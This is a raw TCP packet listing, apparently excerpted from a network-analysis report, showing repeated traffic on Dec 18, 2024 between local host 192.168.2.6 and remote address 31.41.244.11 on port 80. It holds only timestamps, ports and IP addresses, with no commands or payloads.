                                                                                                                                                              Dec 18, 2024 11:47:47.763008118 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.764111042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.764159918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.764161110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.764307022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.765285969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.765305042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.765326977 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.765348911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.766438007 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.766478062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.766532898 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.766568899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.767652988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.767669916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.767695904 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.767714024 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.768810987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.768821955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.768865108 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.769959927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.770009995 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.770047903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.770087004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.771214008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.771225929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.771260023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.771280050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.772237062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.772284031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.772303104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.772336006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.902991056 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.903006077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.903099060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.903646946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.903659105 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.903686047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.903716087 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.904604912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.904617071 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.904690027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.906038046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.906081915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.906332970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.906374931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.906570911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.906620026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.907594919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.907615900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.907634974 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.907649040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.908682108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.908694983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.908726931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.909792900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.909832001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.909909964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.909948111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.911382914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.911402941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.911427021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.911443949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.912265062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.912300110 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.912333965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.912372112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.913518906 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.913543940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.913558960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.913574934 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.914760113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.914774895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.914797068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.914814949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.915880919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.915920973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.915930033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.915961027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.917119980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.917133093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.917166948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.917188883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.918066978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.918098927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.918111086 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.918131113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.919228077 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.919270992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.919290066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.919329882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.920442104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.920490026 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.920557976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.920597076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.921690941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.921704054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.921734095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.921755075 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.922817945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.922863007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.922903061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.922944069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.923911095 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.923955917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.924006939 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.924047947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.925375938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.925390959 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.925424099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.925440073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.926168919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.926181078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.926215887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.926237106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.927354097 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.927369118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.927402973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.927418947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.928472042 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.928484917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.928515911 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.928531885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.929703951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.929717064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.929749012 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.929764986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.930824041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.930836916 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.930867910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.931910038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.931922913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.931956053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.933181047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.933193922 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.933237076 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.934273958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.934317112 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.934365034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.934406996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.935672998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.935686111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.935719013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.936525106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.936568022 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.936992884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.937038898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.937891960 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.937906027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.937933922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.937951088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.939155102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.939167023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.939198971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.940102100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.940114021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.940146923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.941402912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.941442013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.941457987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.941488981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.942404985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.942419052 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.942456007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.943780899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.943794966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.943829060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.944807053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.944849968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.944911003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.944951057 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.945938110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.945950985 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.945977926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.946007013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.947137117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.947174072 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.947205067 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.947244883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.948306084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.948350906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.948379040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.948417902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.949728966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.949742079 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.949770927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.949788094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.950774908 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.950788021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.950819016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.950834036 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.952014923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.952028036 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.952060938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.952078104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.952913046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.952948093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.952958107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.952989101 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.954137087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.954183102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.954194069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.954227924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.955271006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.955284119 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.955319881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.955336094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.956830025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.956876040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.956960917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.957004070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.957592010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.957618952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.957633972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.957648039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.958992004 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.959039927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.959234953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.959275961 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.959954977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.959999084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.960074902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.960114002 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.961185932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.961199999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.961245060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.961245060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.962351084 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.962363005 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.962399960 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.963465929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.963491917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:47.963535070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:47.963535070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.094150066 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.094222069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.094244003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.094271898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.094820976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.094846964 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.094873905 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.094894886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.095931053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.095983982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.096056938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.096358061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.096982002 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.097028017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.097414017 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.097460032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.097474098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.097507954 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.098594904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.098607063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.098639011 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.098659039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.100016117 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.100092888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.100097895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.100146055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.101171970 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.101186037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.101207018 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.101226091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.102123022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.102135897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.102171898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.102196932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.103545904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.103559971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.103585005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.103611946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.104492903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.104506016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.104531050 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.104549885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.105989933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.106003046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.106173992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.106909990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.106923103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.106955051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.108258009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.108270884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.108300924 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.108335972 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.109041929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.109055996 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.109077930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.109095097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.110270023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.110306978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.110325098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.110344887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.111424923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.111455917 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.111463070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.111485004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.112795115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.112840891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.112848043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.112883091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.113765955 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.113779068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:48.113801956 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:48.113820076 CET4987880192.168.2.631.41.244.11
